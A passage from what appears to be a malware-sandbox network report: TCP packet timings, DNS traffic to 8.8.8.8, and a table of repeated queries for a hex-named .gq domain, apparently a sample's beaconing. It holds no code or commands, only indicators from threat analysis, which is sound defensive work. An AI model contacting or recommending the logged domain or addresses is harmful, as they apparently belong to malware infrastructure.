                      Oct 14, 2021 08:30:15.332616091 CEST4993780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:30:15.336416006 CEST4993780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:30:15.352440119 CEST8049937104.21.62.32192.168.2.6
                      Oct 14, 2021 08:30:15.352566957 CEST4993780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:30:15.368554115 CEST8049937104.21.62.32192.168.2.6
                      Oct 14, 2021 08:30:15.454026937 CEST8049937104.21.62.32192.168.2.6
                      Oct 14, 2021 08:30:15.454349041 CEST4993780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:30:15.456326962 CEST8049937104.21.62.32192.168.2.6
                      Oct 14, 2021 08:30:15.456449032 CEST4993780192.168.2.6104.21.62.32
                      Oct 14, 2021 08:30:15.472640038 CEST8049937104.21.62.32192.168.2.6
                      Oct 14, 2021 08:30:16.661818027 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.677809000 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:16.678704977 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.682401896 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.698379040 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:16.698534966 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.717287064 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:16.810215950 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:16.810472965 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.816035986 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:16.816134930 CEST4993880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:16.826240063 CEST8049938172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.292490959 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.308475971 CEST8049939172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.308703899 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.312437057 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.328185081 CEST8049939172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.328321934 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.344182968 CEST8049939172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.426697016 CEST8049939172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.427007914 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.430502892 CEST8049939172.67.219.104192.168.2.6
                      Oct 14, 2021 08:30:18.430712938 CEST4993980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:30:18.443008900 CEST8049939172.67.219.104192.168.2.6

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:28:18.981506109 CEST6034253192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:19.010951996 CEST53603428.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:20.304617882 CEST6134653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:20.325933933 CEST53613468.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:21.290359974 CEST5177453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:21.317846060 CEST53517748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:22.530085087 CEST5602353192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:22.570988894 CEST53560238.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:23.741621971 CEST5838453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:23.760160923 CEST53583848.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:24.836807966 CEST6026153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:24.865097046 CEST53602618.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:25.974273920 CEST5606153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:26.003031015 CEST53560618.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:27.298286915 CEST5833653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:27.316716909 CEST53583368.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:30.236521959 CEST5378153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:30.266340971 CEST53537818.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:31.345115900 CEST5406453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:31.363276005 CEST53540648.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:32.470803976 CEST5281153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:32.486987114 CEST53528118.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:33.632031918 CEST5529953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:33.648431063 CEST53552998.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:34.851088047 CEST6374553192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:34.869492054 CEST53637458.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:35.953857899 CEST5005553192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:35.970498085 CEST53500558.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:37.063189983 CEST6137453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:37.092448950 CEST53613748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:38.346430063 CEST5033953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:38.365737915 CEST53503398.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:39.473190069 CEST6330753192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:39.491631031 CEST53633078.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:41.046897888 CEST5498253192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:41.065442085 CEST53549828.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:42.234715939 CEST5001053192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:42.252979994 CEST53500108.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:43.827435970 CEST6371853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:43.845922947 CEST53637188.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:45.159775019 CEST6211653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:45.178029060 CEST53621168.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:48.000888109 CEST6381653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:48.019318104 CEST53638168.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:49.619648933 CEST5501453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:49.638375998 CEST53550148.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:50.931046009 CEST6220853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:50.949512959 CEST53622088.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:52.281750917 CEST5757453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:52.300395012 CEST53575748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:53.526912928 CEST5181853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:53.543016911 CEST53518188.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:54.606945038 CEST5662853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:54.625006914 CEST53566288.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:56.038455963 CEST6077853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:56.054569006 CEST53607788.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:57.478297949 CEST5468353192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:57.496562958 CEST53546838.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:58.838350058 CEST5932953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:58.857067108 CEST53593298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:00.261539936 CEST6402153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:00.278069973 CEST53640218.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:01.621984959 CEST5612953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:01.640744925 CEST53561298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:03.038508892 CEST5817753192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:03.056396961 CEST53581778.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:06.114991903 CEST5070053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:06.133622885 CEST53507008.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:07.492008924 CEST5406953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:07.510478020 CEST53540698.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:08.682867050 CEST6117853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:08.701395035 CEST53611788.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:09.870501995 CEST5024353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:09.889010906 CEST53502438.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:11.079993010 CEST5506653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:11.098392010 CEST53550668.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:12.308362961 CEST5845453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:12.326812029 CEST53584548.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:13.616075993 CEST5769153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:13.634321928 CEST53576918.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:15.094715118 CEST5948953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:15.112957954 CEST53594898.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:16.619941950 CEST6402253192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:16.638273001 CEST53640228.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:17.969158888 CEST6002353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:17.987740993 CEST53600238.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:20.357798100 CEST5719353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:20.374650002 CEST53571938.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:21.776597023 CEST6441353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:21.795156002 CEST53644138.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:23.380697966 CEST6042953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:23.396900892 CEST53604298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:27.428143978 CEST6034553192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:27.445975065 CEST53603458.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:29.608062983 CEST5873053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:29.624861002 CEST53587308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:31.696376085 CEST5383053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:31.713087082 CEST53538308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:32.966362000 CEST5722653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:32.984905005 CEST53572268.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:35.225338936 CEST5788053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:35.243751049 CEST53578808.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:36.929517031 CEST6085053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:36.947783947 CEST53608508.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:38.099759102 CEST5583053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:38.117574930 CEST53558308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:39.331229925 CEST5514553192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:39.349596024 CEST53551458.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:40.663470984 CEST6409153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:40.681256056 CEST53640918.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:41.832782984 CEST5572853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:41.851002932 CEST53557288.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:43.238637924 CEST5569453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:43.256962061 CEST53556948.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:44.388569117 CEST5392653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:44.406697989 CEST53539268.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:45.724782944 CEST6553153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:45.741152048 CEST53655318.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:46.881611109 CEST6543753192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:46.900079012 CEST53654378.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:48.011307001 CEST5459053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:48.029814005 CEST53545908.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:49.280458927 CEST5131853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:49.299062967 CEST53513188.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:51.840734005 CEST5847453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:51.858999968 CEST53584748.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:55.796895981 CEST5909253192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:55.815201998 CEST53590928.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:56.924676895 CEST5748353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:56.942806959 CEST53574838.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:58.030971050 CEST5383053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:58.047533989 CEST53538308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:59.187026978 CEST4980953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:59.205523968 CEST53498098.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:00.267366886 CEST5281453192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:00.285648108 CEST53528148.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:01.374663115 CEST5106953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:01.393187046 CEST53510698.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:02.507575035 CEST5652653192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:02.525789976 CEST53565268.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:03.656306028 CEST5051253192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:03.674351931 CEST53505128.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:04.837879896 CEST5167953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:04.856111050 CEST53516798.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:05.918864965 CEST5607153192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:05.935167074 CEST53560718.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:07.100869894 CEST5895053192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:07.119254112 CEST53589508.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:08.397211075 CEST5703553192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:08.415246964 CEST53570358.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:09.653837919 CEST5412253192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:09.670599937 CEST53541228.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:11.092576981 CEST5675953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:11.109034061 CEST53567598.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:12.873286009 CEST5922053192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:12.891690969 CEST53592208.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:15.296228886 CEST6221153192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:15.314672947 CEST53622118.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:16.637487888 CEST6203353192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:16.658160925 CEST53620338.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:18.273524046 CEST6124453192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:18.291595936 CEST53612448.8.8.8192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 14, 2021 08:28:18.981506109 CEST192.168.2.68.8.8.80x9641Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.304617882 CEST192.168.2.68.8.8.80xcfd3Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.290359974 CEST192.168.2.68.8.8.80x66b6Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.530085087 CEST192.168.2.68.8.8.80x7b38Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.741621971 CEST192.168.2.68.8.8.80x65d8Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.836807966 CEST192.168.2.68.8.8.80xc6baStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:25.974273920 CEST192.168.2.68.8.8.80xa520Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:27.298286915 CEST192.168.2.68.8.8.80x111eStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:30.236521959 CEST192.168.2.68.8.8.80x868Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:31.345115900 CEST192.168.2.68.8.8.80xe6eeStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:32.470803976 CEST192.168.2.68.8.8.80x3d76Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:33.632031918 CEST192.168.2.68.8.8.80x69a5Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:34.851088047 CEST192.168.2.68.8.8.80x38bStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:35.953857899 CEST192.168.2.68.8.8.80xc4aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:37.063189983 CEST192.168.2.68.8.8.80x7d39Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:38.346430063 CEST192.168.2.68.8.8.80xe711Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:39.473190069 CEST192.168.2.68.8.8.80x25efStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:41.046897888 CEST192.168.2.68.8.8.80x4f40Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:42.234715939 CEST192.168.2.68.8.8.80x6b50Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:43.827435970 CEST192.168.2.68.8.8.80xcc8cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:45.159775019 CEST192.168.2.68.8.8.80xae8bStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:48.000888109 CEST192.168.2.68.8.8.80xd0feStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:49.619648933 CEST192.168.2.68.8.8.80x1cfeStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:50.931046009 CEST192.168.2.68.8.8.80x2f14Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:52.281750917 CEST192.168.2.68.8.8.80x9b51Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:53.526912928 CEST192.168.2.68.8.8.80x9b5cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:54.606945038 CEST192.168.2.68.8.8.80xfafStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:56.038455963 CEST192.168.2.68.8.8.80xc5d7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:57.478297949 CEST192.168.2.68.8.8.80x7539Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:58.838350058 CEST192.168.2.68.8.8.80xcc85Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:00.261539936 CEST192.168.2.68.8.8.80xca48Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:01.621984959 CEST192.168.2.68.8.8.80x41feStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:03.038508892 CEST192.168.2.68.8.8.80x76cbStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:06.114991903 CEST192.168.2.68.8.8.80xe495Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:07.492008924 CEST192.168.2.68.8.8.80xc716Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:08.682867050 CEST192.168.2.68.8.8.80x56caStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:09.870501995 CEST192.168.2.68.8.8.80xad00Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:11.079993010 CEST192.168.2.68.8.8.80xfca0Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:12.308362961 CEST192.168.2.68.8.8.80xce7cStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:13.616075993 CEST192.168.2.68.8.8.80xb217Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:15.094715118 CEST192.168.2.68.8.8.80x1e24Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:16.619941950 CEST192.168.2.68.8.8.80xce2aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:17.969158888 CEST192.168.2.68.8.8.80xf846Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:20.357798100 CEST192.168.2.68.8.8.80xfa06Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:21.776597023 CEST192.168.2.68.8.8.80xc8c9Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:23.380697966 CEST192.168.2.68.8.8.80x4036Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.428143978 CEST192.168.2.68.8.8.80x9f87Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.608062983 CEST192.168.2.68.8.8.80xf256Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.696376085 CEST192.168.2.68.8.8.80xb97aStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.966362000 CEST192.168.2.68.8.8.80xe4c9Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.225338936 CEST192.168.2.68.8.8.80x3787Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.929517031 CEST192.168.2.68.8.8.80x493Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.099759102 CEST192.168.2.68.8.8.80x3e93Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.331229925 CEST192.168.2.68.8.8.80x6c70Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.663470984 CEST192.168.2.68.8.8.80x37c8Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.832782984 CEST192.168.2.68.8.8.80x82b7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.238637924 CEST192.168.2.68.8.8.80xed11Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.388569117 CEST192.168.2.68.8.8.80xcc0dStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.724782944 CEST192.168.2.68.8.8.80x5ccfStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.881611109 CEST192.168.2.68.8.8.80x83fStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.011307001 CEST192.168.2.68.8.8.80x69c5Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.280458927 CEST192.168.2.68.8.8.80x6449Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.840734005 CEST192.168.2.68.8.8.80x6899Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.796895981 CEST192.168.2.68.8.8.80xdfe6Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.924676895 CEST192.168.2.68.8.8.80xdd17Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.030971050 CEST192.168.2.68.8.8.80xb23Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.187026978 CEST192.168.2.68.8.8.80x4332Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.267366886 CEST192.168.2.68.8.8.80x4eStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.374663115 CEST192.168.2.68.8.8.80xbb96Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.507575035 CEST192.168.2.68.8.8.80x9297Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.656306028 CEST192.168.2.68.8.8.80x202fStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.837879896 CEST192.168.2.68.8.8.80x89b0Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.918864965 CEST192.168.2.68.8.8.80xe22dStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.100869894 CEST192.168.2.68.8.8.80x1524Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.397211075 CEST192.168.2.68.8.8.80x1ae7Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.653837919 CEST192.168.2.68.8.8.80xbc15Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
